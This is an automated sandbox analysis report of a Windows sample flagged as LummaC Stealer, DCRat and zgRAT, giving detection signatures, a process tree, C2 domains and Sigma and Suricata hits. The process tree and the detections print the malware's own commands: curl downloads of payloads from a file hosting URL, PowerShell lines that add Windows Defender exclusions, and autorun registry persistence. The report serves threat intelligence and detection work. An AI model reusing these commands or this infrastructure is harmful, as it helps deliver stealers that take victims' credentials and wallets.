Edit tour

Windows Analysis Report
NCTSgL4t0B.exe

Overview

General Information

Sample name:	NCTSgL4t0B.exe renamed because original name is a hash value
Original sample name:	6129fb697b8d4658283864689c040b2cd65923233de7dc75f723e22b6eebc82e.exe
Analysis ID:	1522836
MD5:	76b682b895587819cc3293cc109d3eb1
SHA1:	80e12ef0083ea82fcd3976e520c8f5bee908b830
SHA256:	6129fb697b8d4658283864689c040b2cd65923233de7dc75f723e22b6eebc82e
Tags:	exezelensky-topuser-JAMESWT_MHT
Infos:

Detection

LummaC, DCRat, LummaC Stealer, PureLog Stealer, zgRAT

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Antivirus detection for dropped file

Found malware configuration

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected DCRat

Yara detected LummaC Stealer

Yara detected PureLog Stealer

Yara detected zgRAT

.NET source code contains very large array initializations

AI detected suspicious sample

Adds a directory exclusion to Windows Defender

Allocates memory in foreign processes

C2 URLs / IPs found in malware configuration

Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)

Contains functionality to inject code into remote processes

Creates an undocumented autostart registry key

Creates multiple autostart registry keys

Creates processes via WMI

Drops executables to the windows directory (C:\Windows) and starts them

Hides threads from debuggers

Infects executable files (exe, dll, sys, html)

Injects a PE file into a foreign processes

Loading BitLocker PowerShell Module

LummaC encrypted strings found

Machine Learning detection for dropped file

Sample uses string decryption to hide its real strings

Sigma detected: Dot net compiler compiles file from suspicious location

Sigma detected: Files With System Process Name In Unsuspected Locations

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Suspicious execution chain found

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to detect sandboxes and other dynamic analysis tools (window names)

Tries to resolve many domain names, but no domain seems valid

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Writes to foreign memory regions

AV process strings found (often used to terminate AV products)

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if the current process is being debugged

Compiles C# or VB.Net code

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to modify clipboard data

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to record screenshots

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to simulate mouse events

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Deletes files inside the Windows folder

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Drops PE files to the windows directory (C:\Windows)

Drops files with a non-matching file extension (content does not match file extension)

Enables debug privileges

File is packed with WinRar

Found WSH timer for Javascript or VBS script (likely evasive script)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found evasive API chain checking for process token information

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains executable resources (Code or Archives)

PE file contains sections with non-standard names

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: CurrentVersion NT Autorun Keys Modification

Sigma detected: Dynamic .NET Compilation Via Csc.EXE

Sigma detected: Powershell Defender Exclusion

Sigma detected: Suspicious Electron Application Child Processes

Sigma detected: Usage Of Web Request Commands And Cmdlets

Sigma detected: Use Short Name Path in Command Line

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

NCTSgL4t0B.exe (PID: 3804 cmdline: "C:\Users\user\Desktop\NCTSgL4t0B.exe" MD5: 76B682B895587819CC3293CC109D3EB1)

conhost.exe (PID: 5296 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 3812 cmdline: C:\Windows\system32\cmd.exe /c curl --silent https://file.garden/ZmE_ziOgiFXI9Y48/kdmapper.bin --output C:\Windows\Speech\kdmapper.exe MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

curl.exe (PID: 3492 cmdline: curl --silent https://file.garden/ZmE_ziOgiFXI9Y48/kdmapper.bin --output C:\Windows\Speech\kdmapper.exe MD5: EAC53DDAFB5CC9E780A7CC086CE7B2B1)

kdmapper.exe (PID: 1452 cmdline: "C:\Windows\Speech\kdmapper.exe" MD5: C85ABE0E8C3C4D4C5044AEF6422B8218)

wscript.exe (PID: 7192 cmdline: "C:\Windows\System32\WScript.exe" "C:\Edge\L6lFlVnd0szYUYb26bZc.vbe" MD5: FF00E0480075B095948000BDC66E81F0)

cmd.exe (PID: 7532 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Edge\mikZxAokT1te3xOwV8iiWp5ACQVlwzi0DAV4VCgjFc4vhg.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 7540 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

msedge.exe (PID: 7576 cmdline: "C:\Edge/msedge.exe" MD5: ABD343DF6FBD7334D617F76F6F050E3C)

csc.exe (PID: 7720 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\3htq1mnq\3htq1mnq.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)

conhost.exe (PID: 7728 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cvtres.exe (PID: 7772 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RESBBC9.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSC27CA14B1EE394F4E88C32D707E342A8F.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)

csc.exe (PID: 7788 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\f1yf2e0h\f1yf2e0h.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)

conhost.exe (PID: 7796 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cvtres.exe (PID: 7844 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RESBDCC.tmp" "c:\Windows\System32\CSC75DA780D41F148BEB3E8CF69CEFFE.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)

powershell.exe (PID: 7932 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Idle.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 7952 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WmiPrvSE.exe (PID: 4544 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)

powershell.exe (PID: 7944 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Edge\msedge.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 7976 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 8148 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\TkseHYIaPv.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 8172 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

chcp.com (PID: 2916 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)

w32tm.exe (PID: 6532 cmdline: w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 MD5: 81A82132737224D324A3E8DA993E2FB5)

msedge.exe (PID: 1056 cmdline: "C:\Edge\msedge.exe" MD5: ABD343DF6FBD7334D617F76F6F050E3C)

cmd.exe (PID: 1568 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\CmSUPSwWTx.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 2864 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

chcp.com (PID: 2384 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)

w32tm.exe (PID: 3048 cmdline: w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 MD5: 81A82132737224D324A3E8DA993E2FB5)

Conhost.exe (PID: 6288 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 4872 cmdline: C:\Windows\system32\cmd.exe /c curl --silent https://file.garden/ZmE_ziOgiFXI9Y48/physmeme.bin --output C:\Windows\Speech\physmeme.exe MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

curl.exe (PID: 2172 cmdline: curl --silent https://file.garden/ZmE_ziOgiFXI9Y48/physmeme.bin --output C:\Windows\Speech\physmeme.exe MD5: EAC53DDAFB5CC9E780A7CC086CE7B2B1)

physmeme.exe (PID: 7252 cmdline: "C:\Windows\Speech\physmeme.exe" MD5: D6EDF37D68DA356237AE14270B3C7A1A)

conhost.exe (PID: 7260 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

RegAsm.exe (PID: 7312 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)

Idle.exe (PID: 8044 cmdline: C:\Users\user\AppData\Local\Idle.exe MD5: ABD343DF6FBD7334D617F76F6F050E3C)

Idle.exe (PID: 8056 cmdline: C:\Users\user\AppData\Local\Idle.exe MD5: ABD343DF6FBD7334D617F76F6F050E3C)

msedge.exe (PID: 8064 cmdline: C:\Edge\msedge.exe MD5: ABD343DF6FBD7334D617F76F6F050E3C)

msedge.exe (PID: 8096 cmdline: C:\Edge\msedge.exe MD5: ABD343DF6FBD7334D617F76F6F050E3C)

Idle.exe (PID: 1964 cmdline: "C:\Users\user\AppData\Local\Idle.exe" MD5: ABD343DF6FBD7334D617F76F6F050E3C)

cmd.exe (PID: 2236 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\AntDRUzUoe.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 2500 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

chcp.com (PID: 2860 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Lumma Stealer, LummaC2 Stealer	Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.	No Attribution	https://0xmrmagnezi.github.io/malware%20analysis/LummaStealer/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/lummac2-breakdown#chrome-extensions-crx https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.cyble.com/2023/01/06/lummac2-stealer-a-potent-threat-to-crypto-users/ https://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/	https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Name	Description	Attribution	Blogpost URLs	Link
DCRat	DCRat is a typical RAT that has been around since at least June 2019.	No Attribution	https://axmahr.github.io/posts/asyncrat-detection/ https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/ https://blog.talosintelligence.com/2021/10/crimeware-targets-afghanistan-india.html https://blog.talosintelligence.com/2022/08/modernloader-delivers-multiple-stealers.html https://blogs.blackberry.com/en/2022/01/kraken-the-code-on-prometheus	https://malpedia.caad.fkie.fraunhofer.de/details/win.dcrat

Name	Description	Attribution	Blogpost URLs	Link
zgRAT	zgRAT is a Remote Access Trojan malware which sometimes drops other malware such as AgentTesla malware. zgRAT has an inforstealer use which targets browser information and cryptowallets.Usually spreads by USB or phishing emails with -zip/-lnk/.bat/.xlsx attachments and so on.	No Attribution	https://bazaar.abuse.ch/browse/signature/zgRAT/ https://kcm.trellix.com/corporate/index?page=content&id=KB96190&locale=en_US https://www.cloudsek.com/blog/threat-actors-abuse-ai-generated-youtube-videos-to-spread-stealer-malware https://www.difesaesicurezza.com/cyber/cybercrime-rfq-dalla-turchia-veicola-agenttesla-e-zgrat/ https://www.fortinet.com/blog/threat-research/smokeloader-using-old-vulnerabilities	https://malpedia.caad.fkie.fraunhofer.de/details/win.zgrat

Malware Configuration

Threatname: LummaC

{"C2 url": ["tendencerangej.shop", "surveriysiop.shop", "captainynfanw.shop", "coursedonnyre.shop", "tearrybyiwo.shop", "appleboltelwk.shop", "fossillargeiw.shop", "strappystyio.shop", "tiddymarktwo.shop"], "Build id": "1AsNN2--5899070203"}

Yara Signatures

Dropped Files

Source	Rule	Description	Author
C:\Edge\msedge.exe	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
C:\Edge\msedge.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Users\user\AppData\Local\Idle.exe	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
C:\Users\user\AppData\Local\Idle.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Windows\Speech\kdmapper.exe	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
C:\Windows\Speech\kdmapper.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
Click to see the 1 entries

Memory Dumps

Source	Rule	Description	Author
00000017.00000000.1467994457.0000000000162000.00000002.00000001.01000000.0000000C.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0000000C.00000003.1308955813.0000000006617000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000017.00000002.1537440310.00000000126C9000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
0000000C.00000003.1309568242.0000000006614000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
Process Memory Space: msedge.exe PID: 7576	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
decrypted.memstr	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security
Click to see the 1 entries

Unpacked PEs

Source	Rule	Description	Author
23.0.msedge.exe.160000.0.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
23.0.msedge.exe.160000.0.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
12.3.kdmapper.exe.66656cf.0.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
12.3.kdmapper.exe.66656cf.0.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
12.3.kdmapper.exe.66626cf.1.raw.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
12.3.kdmapper.exe.66626cf.1.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
12.3.kdmapper.exe.66626cf.1.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
12.3.kdmapper.exe.66626cf.1.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
12.3.kdmapper.exe.66656cf.0.raw.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
12.3.kdmapper.exe.66656cf.0.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
Click to see the 5 entries

Sigma Signatures

System Summary

Sigma detected: Files With System Process Name In Unsuspected Locations

Source: File created

Author: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ProcessId: 7788, TargetFilename: c:\Windows\System32\SecurityHealthSystray.exe

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Idle.exe', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Idle.exe', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Edge/msedge.exe", ParentImage: C:\Edge\msedge.exe, ParentProcessId: 7576, ParentProcessName: msedge.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Idle.exe', ProcessId: 7932, ProcessName: powershell.exe

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: "C:\Users\user\AppData\Local\Idle.exe", EventID: 13, EventType: SetValue, Image: C:\Edge\msedge.exe, ProcessId: 7576, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Idle

Sigma detected: CurrentVersion NT Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: explorer.exe, "C:\Users\user\AppData\Local\Idle.exe", EventID: 13, EventType: SetValue, Image: C:\Edge\msedge.exe, ProcessId: 7576, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell

Sigma detected: Dynamic .NET Compilation Via Csc.EXE

Source: Process started

Author: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\3htq1mnq\3htq1mnq.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\3htq1mnq\3htq1mnq.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Edge/msedge.exe", ParentImage: C:\Edge\msedge.exe, ParentProcessId: 7576, ParentProcessName: msedge.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\3htq1mnq\3htq1mnq.cmdline", ProcessId: 7720, ProcessName: csc.exe

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: Suspicious Electron Application Child Processes

Source: Process started

Author: Nasreddine Bencherchali (Nextron Systems): Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Idle.exe', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Idle.exe', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Edge/msedge.exe", ParentImage: C:\Edge\msedge.exe, ParentProcessId: 7576, ParentProcessName: msedge.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Idle.exe', ProcessId: 7932, ProcessName: powershell.exe

Sigma detected: Usage Of Web Request Commands And Cmdlets

Source: Process started

Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: C:\Windows\system32\cmd.exe /c curl --silent https://file.garden/ZmE_ziOgiFXI9Y48/kdmapper.bin --output C:\Windows\Speech\kdmapper.exe, CommandLine: C:\Windows\system32\cmd.exe /c curl --silent https://file.garden/ZmE_ziOgiFXI9Y48/kdmapper.bin --output C:\Windows\Speech\kdmapper.exe, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\NCTSgL4t0B.exe", ParentImage: C:\Users\user\Desktop\NCTSgL4t0B.exe, ParentProcessId: 3804, ParentProcessName: NCTSgL4t0B.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c curl --silent https://file.garden/ZmE_ziOgiFXI9Y48/kdmapper.bin --output C:\Windows\Speech\kdmapper.exe, ProcessId: 3812, ProcessName: cmd.exe

Sigma detected: Use Short Name Path in Command Line

Source: Process started

Author: frack113, Nasreddine Bencherchali: Data: Command: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RESBBC9.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSC27CA14B1EE394F4E88C32D707E342A8F.TMP", CommandLine: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RESBBC9.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSC27CA14B1EE394F4E88C32D707E342A8F.TMP", CommandLine|base64offset|contains: 8c, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe, ParentCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\3htq1mnq\3htq1mnq.cmdline", ParentImage: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentProcessId: 7720, ParentProcessName: csc.exe, ProcessCommandLine: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RESBBC9.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSC27CA14B1EE394F4E88C32D707E342A8F.TMP", ProcessId: 7772, ProcessName: cvtres.exe

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Source: Process started

Author: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Edge\L6lFlVnd0szYUYb26bZc.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Edge\L6lFlVnd0szYUYb26bZc.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Windows\Speech\kdmapper.exe" , ParentImage: C:\Windows\Speech\kdmapper.exe, ParentProcessId: 1452, ParentProcessName: kdmapper.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Edge\L6lFlVnd0szYUYb26bZc.vbe" , ProcessId: 7192, ProcessName: wscript.exe

Sigma detected: Dynamic CSharp Compile Artefact

Source: File created

Author: frack113: Data: EventID: 11, Image: C:\Edge\msedge.exe, ProcessId: 7576, TargetFilename: C:\Users\user\AppData\Local\Temp\3htq1mnq\3htq1mnq.cmdline

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Idle.exe', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Idle.exe', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Edge/msedge.exe", ParentImage: C:\Edge\msedge.exe, ParentProcessId: 7576, ParentProcessName: msedge.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Idle.exe', ProcessId: 7932, ProcessName: powershell.exe

Data Obfuscation

Sigma detected: Dot net compiler compiles file from suspicious location

Source: Process started

Author: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\3htq1mnq\3htq1mnq.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\3htq1mnq\3htq1mnq.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Edge/msedge.exe", ParentImage: C:\Edge\msedge.exe, ParentProcessId: 7576, ParentProcessName: msedge.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\3htq1mnq\3htq1mnq.cmdline", ProcessId: 7720, ProcessName: csc.exe

Suricata Signatures

ET MALWARE Lumma Stealer CnC Host Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-30T18:33:37.618210+0200	2054653	1	A Network Trojan was detected	192.168.2.7	49706	172.67.197.40	443	TCP

ET MALWARE Lumma Stealer Related Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-30T18:33:37.618210+0200	2049836	1	A Network Trojan was detected	192.168.2.7	49706	172.67.197.40	443	TCP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (appleboltelwk .shop)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-30T18:33:35.268714+0200	2056036	1	Domain Observed Used for C2 Detected	192.168.2.7	65440	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (captainynfanw .shop)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-30T18:33:35.239060+0200	2056040	1	Domain Observed Used for C2 Detected	192.168.2.7	60759	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (coursedonnyre .shop)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-30T18:33:35.312038+0200	2056042	1	Domain Observed Used for C2 Detected	192.168.2.7	49694	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fossillargeiw .shop)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-30T18:33:35.295906+0200	2056046	1	Domain Observed Used for C2 Detected	192.168.2.7	58850	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (strappystyio .shop)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-30T18:33:35.325816+0200	2056052	1	Domain Observed Used for C2 Detected	192.168.2.7	51956	1.1.1.1	53	UDP

